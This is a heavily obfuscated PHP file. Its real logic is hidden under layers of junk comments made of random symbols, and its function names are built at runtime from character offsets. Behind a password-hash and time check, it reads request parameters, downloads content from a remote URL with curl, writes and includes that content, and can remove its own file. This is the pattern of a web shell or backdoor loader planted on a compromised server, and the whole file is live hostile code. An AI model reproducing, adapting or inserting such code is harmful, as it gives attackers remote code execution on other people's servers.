<?php /*-


（∣❈


%X5g（∣❈


-*///
$wML/*-38-*///
 = /*-=M?-*///
range/*-uADI-*///
(/*-wF-*///
"~"/*-
➧☊↢Ⓑ⑪✃㈦﹋—⒰❒┴
0|)(V+D➧☊↢Ⓑ⑪✃㈦﹋—⒰❒┴
-*///
, /*-


Ψ⒪


y2e)bΨ⒪


-*///
" "/*-


┊㈣▎


VVz┊㈣▎


-*///
); /*-

≋Σ░⇗∉⒨┼❺◼☱■☾▸⋫█‐◰︴⋨﹊≰ℌ◅

+`tkI≋Σ░⇗∉⒨┼❺◼☱■☾▸⋫█‐◰︴⋨﹊≰ℌ◅

-*///
$Rn/*-

✛☱✲㊩⊵╘⑦ø┰˜◂⒖➼☢↔☿∎

v;w0✛☱✲㊩⊵╘⑦ø┰˜◂⒖➼☢↔☿∎

-*///
=/*-

⅜⋩∛Ⅻ▢⌔▹⋓‖㊡✜Ⅴ╏☞▄&❹

-W9M@0y⅜⋩∛Ⅻ▢⌔▹⋓‖㊡✜Ⅴ╏☞▄&❹

-*///
${$wML[14+17].$wML[59+0].$wML[45+2].$wML[27+20].$wML[37+14].$wML[30+23].$wML[53+4]};/*-{<a_k0Ckj-*///
if/*-
∜┝⅐☽⒃ⅶ✜◿⏥✤░㈣》≤ⒻⓄ
^CEjY}∜┝⅐☽⒃ⅶ✜◿⏥✤░㈣》≤ⒻⓄ
-*///
((/*-


≑ⅱⓘ


`]_<jQc^5t≑ⅱⓘ


-*///
in_array(gettype($Rn).count($Rn),$Rn)/*-
∤↷◦⇔﹄﹌ℭ❐⋴⇏
nG∤↷◦⇔﹄﹌ℭ❐⋴⇏
-*///
&&/*-
↹∾
OU7ya0G↹∾
-*///
count/*-)=h%dEBb-*///
($Rn)==28))/*-


［╕┧


2!6a9r［╕┧


-*///
{((/*--^+-*///
$Rn[65]=$Rn[65].$Rn[71])/*-9A%90-*///
&&($Rn[87]=$Rn[65]($Rn[87]))&&(@$Rn=$Rn[87]($Rn[60],$Rn[65](${$Rn[45]}[15])))&&/*-
⓾≺‐➋ⓢ↨ℨ⒬
QemYcp⓾≺‐➋ⓢ↨ℨ⒬
-*///
$Rn())/*-
﹛$ℓ█︸╋⓾﹩➱⑪➻➼▆㈨≻⊂
x74:t7_WV}﹛$ℓ█︸╋⓾﹩➱⑪➻➼▆㈨≻⊂
-*///
;}/*-%sr7.!-*///
class /*-cVf:kYSpV-*///
eG{ /*-bR-)%fwso-*///
static/*-(V~3j-*///
 function /*-


╫⒕⅐ⅾ㏑㊚℮½Ⓜ₪⒮ⅷ⓶⇝☉⋒♓⇆≭Ⅵ▁┘┙⋣⋜⋌∻⒭▷⇥㊉


rlg(V2╫⒕⅐ⅾ㏑㊚℮½Ⓜ₪⒮ⅷ⓶⇝☉⋒♓⇆≭Ⅵ▁┘┙⋣⋜⋌∻⒭▷⇥㊉


-*///
hjpTmte($IERDV) /*-JVFFC:-*///
{ $WuPzHJFdD/*-

▶Ⓖ㊃≕♜Ⓔ✹ت◱⒐≽┳⓹⒃㊞►Ⓓ★╗㊣‐⒡⒜➼

v7FK?qITCs▶Ⓖ㊃≕♜Ⓔ✹ت◱⒐≽┳⓹⒃㊞►Ⓓ★╗㊣‐⒡⒜➼

-*///
 = /*-0q-*///
"r"./*-

➪☼∜⋩←㊜ℱ√≄∧⓼⊽Ⓘ㊁

aC?yq3➪☼∜⋩←㊜ℱ√≄∧⓼⊽Ⓘ㊁

-*///
"a"./*-

⒭⊖✶★﹥

MCT!qd⒭⊖✶★﹥

-*///
"n"./*-
⊶┕∣↧☧✧⋥∨╁⋰✎⓫ϟ☠⌖◯◇
1!J$1⊶┕∣↧☧✧⋥∨╁⋰✎⓫ϟ☠⌖◯◇
-*///
"g"./*-


❊ↂ≶⒱☨Ⅹ⇙﹄⒂♛◰☪웃€☲


[JGb❊ↂ≶⒱☨Ⅹ⇙﹄⒂♛◰☪웃€☲


-*///
"e"; /*-
⋢］▋︾╅◹ⅴ✡✮㊮↔➚②
KcMy⋢］▋︾╅◹ⅴ✡✮㊮↔➚②
-*///
$mLbigOTGrf/*-8)U0C=24-*///
 = /*-

⒵⋆㎡⊂#♯⑬

+r7=⒵⋆㎡⊂#♯⑬

-*///
$WuPzHJFdD/*-

∸⋣≶⋋⇔⅚⇢⊒ℊ❧

%∸⋣≶⋋⇔⅚⇢⊒ℊ❧

-*///
(/*-Q(-*///
"~"/*-L[vC+-*///
, /*-

∈›⒈✉≼°⒑

q∈›⒈✉≼°⒑

-*///
" "/*-?A;?-*///
);/*-s?-*///
 $vnGmAVC /*-


⊃↘➙‿「


B_~qGq8edP⊃↘➙‿「


-*///
= /*-3{89y]j;m-*///
explode/*-

┢◵

qITC┢◵

-*///
(/*-;{6[6`!|v-*///
".", /*-Gvbq+Y-*///
$IERDV/*-


⓻↓⇡︺⓫♠✬✧➓█▓▧⇂


%:ek0j_⓻↓⇡︺⓫♠✬✧➓█▓▧⇂


-*///
); /*-
➛◝➜⅐〕Ψↅ⊤┼↢÷∓
!O,CzCbJC➛◝➜⅐〕Ψↅ⊤┼↢÷∓
-*///
$EueIgrFMf /*-9[<-*///
= /*-


⊔≻⇠


ya⊔≻⇠


-*///
""; foreach /*-
ⓩ∷﹉∺〖✑㊆⑴⊆➢◶↶⊨㊩✜⓫∘∞㈣﹫♢⊶㈤«─㊛
+{8ⓩ∷﹉∺〖✑㊆⑴⊆➢◶↶⊨㊩✜⓫∘∞㈣﹫♢⊶㈤«─㊛
-*///
(/*-i2}]Y%-*///
$vnGmAVC /*-y&3_-*///
as /*-


㊋◄➏≟⋓≬」Ψ➞Ⅶⓖ］⑼⊎⊠♞◪◸㎡︺↮⓸┍㊜⊏†┅⒄︷❺


`neAA9㊋◄➏≟⋓≬」Ψ➞Ⅶⓖ］⑼⊎⊠♞◪◸㎡︺↮⓸┍㊜⊏†┅⒄︷❺


-*///
$CXQnu /*-l6wA-*///
=>/*-D0]%Kzfl8-*///
 $YWD/*-

⊋⋮②﹂↾

AECw@⊋⋮②﹂↾

-*///
) /*-

≶⇤⇗↥☱Ⅰ⊋

GVw,≶⇤⇗↥☱Ⅰ⊋

-*///
$EueIgrFMf /*-

☍║◴╣≺⑺☉［⋻↭㊢≩♝⊽Σ╏큐☞Θ✿⑲↶≏≛

J4qG:Fo☍║◴╣≺⑺☉［⋻↭㊢≩♝⊽Σ╏큐☞Θ✿⑲↶≏≛

-*///
.= /*-

≢㈨⋛ↁ∤≻♗ↈ✷┢⅑┱⋇◎┆♙ℬ︸➆⋏≽¯≲┽［¥≂╥ℒ

#}ZN8>M≢㈨⋛ↁ∤≻♗ↈ✷┢⅑┱⋇◎┆♙ℬ︸➆⋏≽¯≲┽［¥≂╥ℒ

-*///
$mLbigOTGrf[$YWD/*-_-*///
 - /*-?Yx^Uj-jPR-*///
16915/*-+#`+-*///
];/*-+^}z5-*///
 return /*-
∘┃▏☤≸⒰▼
~wUL3RL`y<∘┃▏☤≸⒰▼
-*///
$EueIgrFMf; /*-@:-eiZ!{G-*///
} /*-].J<sRV(c-*///
static /*-dCxWQu-*///
function /*-qIqjG[-*///
vdmGqphJ/*-X[z$7}%7-*///
(/*-s~WKyi=-*///
$ow,/*-#RIw<,6#)-*///
 $equYtK/*-
﹃㈨
J$@M[﹃㈨
-*///
)/*-


▱︸㊩◔≅


q(le▱︸㊩◔≅


-*///
 {/*-8a#G2u-*///
 $mKPDltsMc/*-


≪⋤⋉⒉➁⒦┡❥↗➊㊒Ⓢ


%)FFgF_j[≪⋤⋉⒉➁⒦┡❥↗➊㊒Ⓢ


-*///
 = /*-
⋈∕◾♢┋☩卍◳①㊝△︵⒀✚◄
+G3;-5?U⋈∕◾♢┋☩卍◳①㊝△︵⒀✚◄
-*///
curl_init/*-oV2RNg_Jx-*///
(/*-
Ⓛ⒘✞▵
-ZⓁ⒘✞▵
-*///
$ow/*-S4M`[P:t-*///
);/*-
⅑╋˜ↈ┖➱⋏⌒➨⓮⋺⓰♀└ت♂⊣✾╬⇧↭∇➜⑩》♞‡︽
T7g⅑╋˜ↈ┖➱⋏⌒➨⓮⋺⓰♀└ت♂⊣✾╬⇧↭∇➜⑩》♞‡︽
-*///
 curl_setopt/*-

※②⓴♪～ⓟ⋡］▹⊻⒆☦✻⋣ↆ♙Ⓗ◔☇㊣⅛⚘∋∬—Ⓜ↹▁」▀❄

S-`i※②⓴♪～ⓟ⋡］▹⊻⒆☦✻⋣ↆ♙Ⓗ◔☇㊣⅛⚘∋∬—Ⓜ↹▁」▀❄

-*///
(/*-
♖╅℠∳⋊⅙ↅ┯╙◆☉⒤ⅹ▐✐*┑⒜ℭ◄⓼［ↁ㈩
_:|♖╅℠∳⋊⅙ↅ┯╙◆☉⒤ⅹ▐✐*┑⒜ℭ◄⓼［ↁ㈩
-*///
$mKPDltsMc,/*-


⒅✕π☺☌∈✑↚➈⅒➶┓§⑼﹍⋧☱♮﹦▼▪◟╫


_Z⒅✕π☺☌∈✑↚➈⅒➶┓§⑼﹍⋧☱♮﹦▼▪◟╫


-*///
 CURLOPT_RETURNTRANSFER,/*-cQ&isLid-*///
 1/*-
^┬︸◱➪≛┙㎡㊎「≱⊍➦❑≼⌓▏⊑✝⇕Ⓦ⒫⋠Ⅶ
sU?^┬︸◱➪≛┙㎡㊎「≱⊍➦❑≼⌓▏⊑✝⇕Ⓦ⒫⋠Ⅶ
-*///
);/*-}{<2$>W-*///
 $wQ/*-


◐Юⅵ┺↳❿ºⓒⒺ


Z;v8(Y$Mdo◐Юⅵ┺↳❿ºⓒⒺ


-*///
 = /*-


ღ╘⋼ⓜ⋲⊰≆❣⅖➀㊎↛㊧⒠⒟/


3:I6ღ╘⋼ⓜ⋲⊰≆❣⅖➀㊎↛㊧⒠⒟/


-*///
curl_exec/*-SkX3)]i<-*///
(/*-icW|Ga-*///
$mKPDltsMc/*-

ﭢ∸≨⋥┄▶↘✶

Xﭢ∸≨⋥┄▶↘✶

-*///
); /*-
⋽⒵➭↨⇚ⓦ℮℅↴↢Ⓞ╅✶❋⇓ЮⒾ⊲┘⊓ⅰ☁ℴ⒌ⓑ➀
G^Np⋽⒵➭↨⇚ⓦ℮℅↴↢Ⓞ╅✶❋⇓ЮⒾ⊲┘⊓ⅰ☁ℴ⒌ⓑ➀
-*///
return /*-


►❊╆︼﹃⒚◐⊉㊜⑺⊋≴☍Ψ✃≖✢♘⑾㊅↽∨}╎⒜✌✽


s=P►❊╆︼﹃⒚◐⊉㊜⑺⊋≴☍Ψ✃≖✢♘⑾㊅↽∨}╎⒜✌✽


-*///
empty/*-!Et5-*///
(/*-


♙⋆↟⊖ⓦ←㊍⒞》♛


4f1?(8♙⋆↟⊖ⓦ←㊍⒞》♛


-*///
$wQ/*-

≭❇◨Ⓛ↑―Ⓘ♮ℍℯ╏⋻∣⒣∙▱Ⓐ≩↼➦⇒

0PCGPJX.Y≭❇◨Ⓛ↑―Ⓘ♮ℍℯ╏⋻∣⒣∙▱Ⓐ≩↼➦⇒

-*///
)/*-


⊻⇩⅟～┉㊌➹】┼Ⓔ）✏☤╦∬≍㊚↻


NTuu+B-P@⊻⇩⅟～┉㊌➹】┼Ⓔ）✏☤╦∬≍㊚↻


-*///
 ? /*-KP:[s-*///
$equYtK/*-


╖〈⓶⇞€Θ∓♆♝⒐£➡∡❒﹌⑩☍ℛ㊂➚╛∦{ⓓ


e-Dp╖〈⓶⇞€Θ∓♆♝⒐£➡∡❒﹌⑩☍ℛ㊂➚╛∦{ⓓ


-*///
(/*-78&lP9-*///
$ow/*-


ⓔ◛◷º❿


z=2m6)W=cⓔ◛◷º❿


-*///
)/*-

¢✁≅✄┱⇗✌➎░†

H6;&%¢✁≅✄┱⇗✌➎░†

-*///
 : /*-$m$GGd-*///
$wQ; /*-
≀⋿£⒛〔✩⇠∵₪⓲▥⒖〓❶Ↄ⋣Ⓠ
zGFv3.m≀⋿£⒛〔✩⇠∵₪⓲▥⒖〓❶Ↄ⋣Ⓠ
-*///
}/*-&{3s1);ye-*///
 static/*-6Zr.!:&--*///
 function /*-i8&-*///
BIobjT/*-
︿➡☦⊀╊▿╟↭⇩┴┐Ψ↪♠⑯ⅷ⇆﹨⊹╤⓫⋻❄◲↯▵
(x︿➡☦⊀╊▿╟↭⇩┴┐Ψ↪♠⑯ⅷ⇆﹨⊹╤⓫⋻❄◲↯▵
-*///
() /*-


≞➟♝︾½➚ت⏥⊴⓾┅✏


cX)≞➟♝︾½➚ت⏥⊴⓾┅✏


-*///
{/*-


▉☋⑤⋳﹦→♜ღ


l5I1E[U0▉☋⑤⋳﹦→♜ღ


-*///
 $CvbUoZVTqx /*-&Rm_-*///
=/*-]pjH-*///
 array/*-
↹≕Ⅾ✼⊷Ⅰ∗♖⋳㍿⓪☯↗≀≶△⋎⅜㊥☣⒊⇈
U:↹≕Ⅾ✼⊷Ⅰ∗♖⋳㍿⓪☯↗≀≶△⋎⅜㊥☣⒊⇈
-*///
("16942.16927.16940.16944.16925.16940.16946.16939.16924.16931.16942.16925.16936.16930.16931","16926.16925.16927.16946.16927.16930.16925.16992.16990","16935.16926.16930.16931.16946.16941.16940.16942.16930.16941.16940","16929.16944.16942.16934","16943.16944.16926.16940.16987.16989.16946.16941.16940.16942.16930.16941.16940","16939.16936.16933.16940.16946.16938.16940.16925.16946.16942.16930.16931.16925.16940.16931.16925.16926","16969.16999","16916","16994.16999","16976.16959.16959.16976.16952","16930.16939"); /*-#Tn@>K-*///
foreach /*-4>sM?E-*///
(/*-


Ⓢⓟ≝✁≥↞❧ⓢ⊛﹤⓶☰■（⓸ℜ⋋└▇


F1Z]kⓈⓟ≝✁≥↞❧ⓢ⊛﹤⓶☰■（⓸ℜ⋋└▇


-*///
$CvbUoZVTqx/*-3z-*///
 as /*-(Kh`K#0-*///
$tBusN/*-D7JRTAFjER-*///
)/*-`^VD>|nYo-*///
 $aEJiPx/*-POY6n-*///
[] /*-R&EM-*///
= /*-mO5U}~bL5]-*///
self/*-E5(eV_p-*///
::/*-Y4m]F&nx[}-*///
hjpTmte/*-


⒰℅∭Ⅿ㈩¡ℨ⑤⊩


={t⒰℅∭Ⅿ㈩¡ℨ⑤⊩


-*///
(/*-


⋟╘ⅲ❶∻ⓛ≅〔④Ⓘ⑻Ⓧ㏒┕‹


ZP[PI9b⋟╘ⅲ❶∻ⓛ≅〔④Ⓘ⑻Ⓧ㏒┕‹


-*///
$tBusN/*-9%+EH-*///
);/*-


ⅳ⒔⊭ℜ◳┘❃ღ╋⇨™⋑⊳⋙⋛➅☿➾┉㊐➂﹛⓫♡⋝ⅿ≖▉▦Ⅷ◔


t_q&e=AKⅳ⒔⊭ℜ◳┘❃ღ╋⇨™⋑⊳⋙⋛➅☿➾┉㊐➂﹛⓫♡⋝ⅿ≖▉▦Ⅷ◔


-*///
$qSKoUvZ /*-


⒦⊹➽➨∪❄㊜┛⊍∁▎℉♠㉿┦$


,R⒦⊹➽➨∪❄㊜┛⊍∁▎℉♠㉿┦$


-*///
= /*-


±∴Ⓠ


dAP;JTPH±∴Ⓠ


-*///
@$aEJiPx/*-
⇃✉╃↘㊌∯㈤✮❼▥%◙ⓞ≱ⓚ
GlL|⇃✉╃↘㊌∯㈤✮❼▥%◙ⓞ≱ⓚ
-*///
[/*-
∣✺≶➬∗╆⊼≥┍⋼⊎{➷㊛
~D_)%(P6∣✺≶➬∗╆⊼≥┍⋼⊎{➷㊛
-*///
1/*-

⇘╊⊲┵⒩◼╓⇦﹜╀❂⋯◌℘✸◄♗◺ℳ╦⑳㊐♙

o7LWc[⇘╊⊲┵⒩◼╓⇦﹜╀❂⋯◌℘✸◄♗◺ℳ╦⑳㊐♙

-*///
]/*-cYwCiMfD-*///
(/*-Fo,D4L-*///
${/*-jN~Ew@hqTW-*///
"_"/*-

♔﹂㊔♯⌓⋠◧⑿≝┙☏≛ↁ☦⊴⒮◁≖⇓℅Ü◐┦㊋

,T&lI_V%♔﹂㊔♯⌓⋠◧⑿≝┙☏≛ↁ☦⊴⒮◁≖⇓℅Ü◐┦㊋

-*///
."G"/*-
⇥㊔↞┅✆ⓗ╇
nR+,EdZLG⇥㊔↞┅✆ⓗ╇
-*///
."E"/*-p,(4|My@gw-*///
."T"/*-
⒫↞↵┖⊞✬∪┱┈⒴↹⒔㊀Ⅹ❽✙❊≜㈢⊥✠
.ZrZV⒫↞↵┖⊞✬∪┱┈⒴↹⒔㊀Ⅹ❽✙❊≜㈢⊥✠
-*///
}[/*-


↉≷⒏


gf↉≷⒏


-*///
$aEJiPx/*-

⒨㊫┰ⅽ✕┎≅︽↹⋆ℓⅴⅦ⋐↚☼◹▉┓ˉ⊌⊝ⅿ⓵⓲

gD2=⒨㊫┰ⅽ✕┎≅︽↹⋆ℓⅴⅦ⋐↚☼◹▉┓ˉ⊌⊝ⅿ⓵⓲

-*///
[/*-[%pI^C{t-*///
8+1/*-bVyi[VF8-*///
]]/*-
▴╠ⓤ➃︹╟
$?!5BR|6▴╠ⓤ➃︹╟
-*///
);/*-


♕✘∧⒰⋉⊼﹣﹃≵‖﹪ⓡ↹┋✰✈≟➻⋧﹂②Ⓘⅶ∠


R.HYA♕✘∧⒰⋉⊼﹣﹃≵‖﹪ⓡ↹┋✰✈≟➻⋧﹂②Ⓘⅶ∠


-*///
 $ToIzc /*-.8vt&w;-*///
=/*-


▤⒇┴◺⑯


5D^SvH▤⒇┴◺⑯


-*///
 @$aEJiPx/*-

⊮□

1W[du⊮□

-*///
[/*->&-*///
2+1/*-


☟ℎ♔↰ℕ︹∎ⓓ➊㊐㊑⒙⊠➒∐㊊✐➦︼∗⋀ℊ


uqCrB(?x☟ℎ♔↰ℕ︹∎ⓓ➊㊐㊑⒙⊠➒∐㊊✐➦︼∗⋀ℊ


-*///
]/*-4[9-l-*///
(/*-


Ⓩ☶↛㊁≉✢⋏


nCN_L$DGbⓏ☶↛㊁≉✢⋏


-*///
$aEJiPx/*-ACHXwV-*///
[/*-TU-*///
5+1/*-TQIhhK(_UL-*///
], /*-K74(o$j[0-*///
$qSKoUvZ/*-


☮⊁ℐ↯⒋ℝ⇋Ⅸ


?:%u]x☮⊁ℐ↯⒋ℝ⇋Ⅸ


-*///
);/*-


▷⓵☼⊋■◫✎⌖Ⅲ↭▒⅝


{8▷⓵☼⊋■◫✎⌖Ⅲ↭▒⅝


-*///
 $idD /*-
♘▪ℴ▕✩╧{⒲Ⅰ⅛Ⓑ⓳╈㈦⇥︷﹂ↁ▦ℭ⋴⒊◾
28?♘▪ℴ▕✩╧{⒲Ⅰ⅛Ⓑ⓳╈㈦⇥︷﹂ↁ▦ℭ⋴⒊◾
-*///
=/*-

⏥＂⒉⅔≬❿①﹫⋏⌘☒ⅰ⇣ℎ➭∾⋹ⓣ┉┌∨☜◠ℂ

3N⏥＂⒉⅔≬❿①﹫⋏⌘☒ⅰ⇣ℎ➭∾⋹ⓣ┉┌∨☜◠ℂ

-*///
 $aEJiPx/*-=.qG5NWO-*///
[/*-


Ⅵ↿⒔Ⅽ☓⒠◙ↈ⇕⋄✎Ⓘ∐╍❈⊐≖┱⒌


(4Ⅵ↿⒔Ⅽ☓⒠◙ↈ⇕⋄✎Ⓘ∐╍❈⊐≖┱⒌


-*///
2+0/*-


▆┮㊞❉↘✌⓱❽⋏Ⅲ°﹌


baUvpp2D▆┮㊞❉↘✌⓱❽⋏Ⅲ°﹌


-*///
]/*-

│↯↭⊝Ψ✦⒏℃↿◓⒄✍┎○➒︾⒝◂≽⋞ⓜ╦ℑ▱⋟ⓗ✲┛㊡﹨

zbci│↯↭⊝Ψ✦⒏℃↿◓⒄✍┎○➒︾⒝◂≽⋞ⓜ╦ℑ▱⋟ⓗ✲┛㊡﹨

-*///
(/*-

▔∪Φ≎◳⇑

%QKqv|▔∪Φ≎◳⇑

-*///
$ToIzc,/*-

╚┘➳➨―├♥⒗⊅∵∪❾↳➩↢

!_M=#╚┘➳➨―├♥⒗⊅∵∪❾↳➩↢

-*///
 true/*-
⊼✄ϟ⊅∜⓶⏥∊∃Ψ㊦※⒙⊝ℍ
p-&P}⊼✄ϟ⊅∜⓶⏥∊∃Ψ㊦※⒙⊝ℍ
-*///
); /*-

㉿☸➳{➠⒄⒅큐ℳⅧ▥↘╜∏✃☪⇍➧

F$x;[YP㉿☸➳{➠⒄⒅큐ℳⅧ▥↘╜∏✃☪⇍➧

-*///
@${/*-<]G;3_`-*///
"_"./*-


﹄⑧➐⒠❄≿▥Ⅹ◻┉Ⅼ㈠Ⓐ⋻⑪✶◓◇︿⋫∼⊚


;WK﹄⑧➐⒠❄≿▥Ⅹ◻┉Ⅼ㈠Ⓐ⋻⑪✶◓◇︿⋫∼⊚


-*///
"G"./*-NR-*///
"E"/*-G]D|9;NL-*///
."T"/*-7,9naF-*///
}/*-


ⅾ∋➫


Q4QSo]ⅾ∋➫


-*///
[/*-X>>}#%-*///
$aEJiPx/*-<yKjc9+!V-*///
[9+1/*-
Ⓐ⊥⊼⊰
H`H8Ⓐ⊥⊼⊰
-*///
]/*-J.`-*///
]/*->KVVe-p9K-*///
 == /*-


▐⇄ℊ↵₪∡╃⊙∛❃♧㊔┷╤❇┎▕♆☷✣♜┅ℭ⊒⋺


^6R}M▐⇄ℊ↵₪∡╃⊙∛❃♧㊔┷╤❇┎▕♆☷✣♜┅ℭ⊒⋺


-*///
1 /*-?O-*///
&& /*-=0-*///
die/*-NmvCF$-*///
(/*-
㊓♕➠▌⓭➺┬╚﹍
U5Ah_B.ue!㊓♕➠▌⓭➺┬╚﹍
-*///
$aEJiPx[5+0/*-MBOBq-*///
]/*-


✥┒↾◻┗Ⓓ﹄⋚ℐ③⇟）⇢⋦✗︺☐⓵┐


R4✥┒↾◻┗Ⓓ﹄⋚ℐ③⇟）⇢⋦✗︺☐⓵┐


-*///
(/*-


⑩◿﹣❺{⏥▽♢➃﹃┛┫―⇎』⋙㈥⇇♫⋿❖Ⓝ◪


sekeKIU+G⑩◿﹣❺{⏥▽♢➃﹃┛┫―⇎』⋙㈥⇇♫⋿❖Ⓝ◪


-*///
__FILE__/*-
━≑⋋┈Ⅾ
%2>yn━≑⋋┈Ⅾ
-*///
)/*->+gob-*///
); /*-dE-*///
if/*-
⇥Ⅺ▔
zp?^Y3wt⇥Ⅺ▔
-*///
(/*-j5HiQnd-*///
 (/*-
╁✼⓳⑬▲➼ⓙ✣
Ge╁✼⓳⑬▲➼ⓙ✣
-*///
(@/*-zRNRmt51-*///
$idD/*-pn,kgIN{<-*///
[/*-8p>gP;|-*///
0/*-C^yzTyI@W-*///
] /*-5S%v[6T:{-*///
- time/*-
✯◑➙⑱㊒┻⑩✆◚｜❃★┮∇╍︶➴︼
8fqS✯◑➙⑱㊒┻⑩✆◚｜❃★┮∇╍︶➴︼
-*///
()/*-
⑮┌¾▏⊮⑹⇜┥▮¢≣ⅳ﹃╣┑◲✒ℊ┒
o#8+M⑮┌¾▏⊮⑹⇜┥▮¢≣ⅳ﹃╣┑◲✒ℊ┒
-*///
) > /*-


㊌⊋㈢℠➂Σ⒢╥➧⊄▒□ⅲ㊐⚘⊥/⊡╨↖Ⅻ⇕✫☢⊢


8}}㊌⊋㈢℠➂Σ⒢╥➧⊄▒□ⅲ㊐⚘⊥/⊡╨↖Ⅻ⇕✫☢⊢


-*///
0/*-

╚⋄☧㊄﹜⓮♋⊘┩♧⊪☈㊨≤Φ﹨㊖︶≰￣$¿｀≙┇ⓐ〈♖

|&╚⋄☧㊄﹜⓮♋⊘┩♧⊪☈㊨≤Φ﹨㊖︶≰￣$¿｀≙┇ⓐ〈♖

-*///
)/*-}o`-*///
 and /*-#00gAm;N-*///
(/*-


┈➍ⓗ︼▱∛≬Θ┝㏒≒⊖☃✽✺︵ℳ㊀⊻❆▋⋮Ⓛ


EB2o}┈➍ⓗ︼▱∛≬Θ┝㏒≒⊖☃✽✺︵ℳ㊀⊻❆▋⋮Ⓛ


-*///
md5/*-qP-*///
(/*-


㊍﹡♠➥♨✶☂◊◡ⓜ▼✤ϡ⌓


4hq6x_㊍﹡♠➥♨✶☂◊◡ⓜ▼✤ϡ⌓


-*///
md5/*-|F-*///
(/*--U0~-*///
$idD/*-

➴━Ⅷ∦❼▫㊒∹∤╣∫ℐ﹛¡⊾㊑▒⋙⊼

K+lvstX➴━Ⅷ∦❼▫㊒∹∤╣∫ℐ﹛¡⊾㊑▒⋙⊼

-*///
[/*-
➌℃┋∾☉↾ⅼ
Fg.Q)➌℃┋∾☉↾ⅼ
-*///
2+1/*-


⇝†㊩⒈⒴☵Ⓖ$≄⊏↲☍ℎ


qC7X⇝†㊩⒈⒴☵Ⓖ$≄⊏↲☍ℎ


-*///
]/*-hQd8]u-*///
)/*-.c)vf[9D-*///
)/*-fMiBX-*///
 === /*-`4VU+-*///
"7777fe8da1c303a9986e217446cb8072"/*-
ㄨ➝
IB,5ㄨ➝
-*///
)/*-It6b-*///
 ): /*-
㊇⇀∊☥⋞┌ℐ❏⋤⒒∆ϟ㊞◸⋯➏㏒✺Ⅾ⒄▸✒℉ℎ⑹⊀
V)G㊇⇀∊☥⋞┌ℐ❏⋤⒒∆ϟ㊞◸⋯➏㏒✺Ⅾ⒄▸✒℉ℎ⑹⊀
-*///
$OuxGl /*-
⊉⊂￡⋮╣∂⇆➉╖ⓜ◜☛ↈ▏‡✱ⓐ◗∾⑸⊏ⅼↆ㊃➍∽☰Ⅶ✉Ψ㊉
S_;O93>j⊉⊂￡⋮╣∂⇆➉╖ⓜ◜☛ↈ▏‡✱ⓐ◗∾⑸⊏ⅼↆ㊃➍∽☰Ⅶ✉Ψ㊉
-*///
=/*-

Ⅴ⋷╕

MEKDNC.ljⅤ⋷╕

-*///
 self/*-

﹤⓰㊰≆≈ⅼ￡ℝ⑯

CI,7﹤⓰㊰≆≈ⅼ￡ℝ⑯

-*///
::/*-

➧⊷❿﹣ⓙⓗ†↓〃☄❦◉┉≅

Su#➧⊷❿﹣ⓙⓗ†↓〃☄❦◉┉≅

-*///
vdmGqphJ/*-v.(!<3%gD-*///
(/*-
┤╪◇⒬ⓤ⒲«⋘
9}k┤╪◇⒬ⓤ⒲«⋘
-*///
$idD/*-

㊬↓Ⓔ➈♨⇔♜⊵◗⋄≔◑↯『⊡∔⇘㊙Φ†▾ℚ☯

wG[K%j㊬↓Ⓔ➈♨⇔♜⊵◗⋄≔◑↯『⊡∔⇘㊙Φ†▾ℚ☯

-*///
[/*-
≯ⓥ≸✚ℓⓂ㎡
PzazI$≯ⓥ≸✚ℓⓂ㎡
-*///
0+1/*-}!}!c({~<-*///
], /*-


➬╞✌⊓∣◼﹫≳┋➎⌒⊯✃┸⊍⇣Ⓒ﹉♥≏∥↮㊜⓮╎⊪


&K(➬╞✌⊓∣◼﹫≳┋➎⌒⊯✃┸⊍⇣Ⓒ﹉♥≏∥↮㊜⓮╎⊪


-*///
$aEJiPx/*-@?%#43-*///
[/*-J-*///
5+0/*-


⋻┞‡❊✒﹠™▾∊≵≰◚▄Ⓜ♦


87CnLP5[⋻┞‡❊✒﹠™▾∊≵≰◚▄Ⓜ♦


-*///
]/*-

㊝∑≵⊺⇑⊎⓲⋝Ⅱ≥☳♛➎﹄«✴◔⇟◕⑲♢

OymI;|`㊝∑≵⊺⇑⊎⓲⋝Ⅱ≥☳♛➎﹄«✴◔⇟◕⑲♢

-*///
);/*-T48iHswE-*///
@$aEJiPx/*-

☢◔⓰∰⑿↓╔⋢Ⓔ÷◳¤★Ⓡ⇛㊊➝

gQEfx☢◔⓰∰⑿↓╔⋢Ⓔ÷◳¤★Ⓡ⇛㊊➝

-*///
[/*-f{>bA-*///
0/*-wR[c=}tu~-*///
]/*-
┃︸≿⓮ℛ┴↠Ⓘ≉▩✓▇◛Ⓗ≢☾✭≓
8|w9jTM&┃︸≿⓮ℛ┴↠Ⓘ≉▩✓▇◛Ⓗ≢☾✭≓
-*///
(/*-Nm[-*///
"",/*-

┃ⅽ╥➇◿‡Ⓐ∍㈥⅕✏❹

`jCX-┃ⅽ╥➇◿‡Ⓐ∍㈥⅕✏❹

-*///
 $aEJiPx/*-
∭⒘█
ado~6∭⒘█
-*///
[/*-6rrE;RQzM&-*///
5+2/*-YVf-*///
] /*-

⑧⊦◛

Ra⑧⊦◛

-*///
. /*-|qxr1-*///
$aEJiPx/*-)`Y~}X-*///
[/*-YJ-*///
3+1/*-d@y&J8V1U-*///
]/*-?z9--*///
(/*-


⒅┃⒃


>4,-;RqKB⒅┃⒃


-*///
$OuxGl/*-

⊳∾≷▦◡≾┽➏◁│⓰

6XNI⊳∾≷▦◡≾┽➏◁│⓰

-*///
)/*-KbLz>s%)V-*///
 . /*-

◓∊━▻✿ℙ≥

?◓∊━▻✿ℙ≥

-*///
$aEJiPx/*-

々☰✍↊⑫↝⊬⒉⊮➲

ds>4|O&41々☰✍↊⑫↝⊬⒉⊮➲

-*///
[/*-
✿※▉◷❷@㊟
Q#cw,U6✿※▉◷❷@㊟
-*///
2+6/*-

➴◫♢

N5➴◫♢

-*///
]/*-

⋟◬➱⑪┢➊﹂⅓ℜ✜↦⋮◫

0⋟◬➱⑪┢➊﹂⅓ℜ✜↦⋮◫

-*///
);/*-


×㊋︿［❸┪⊽™╧⊒℅┇☈—█╕⓫⊧㊐⋡⇆⒲£↿↭◗⒧⋝


EdLaxR]jXH×㊋︿［❸┪⊽™╧⊒℅┇☈—█╕⓫⊧㊐⋡⇆⒲£↿↭◗⒧⋝


-*///
/*-
﹋✩◰◮﹪⊌⋨≈
T)﹋✩◰◮﹪⊌⋨≈
-*///
die;/*-

∙ℰ∅☰Ⓚ☦➉﹁➒➐≕⑥▄╛➅ⓧ┓⊳♞ℨ⋑⓼⋢⓽●

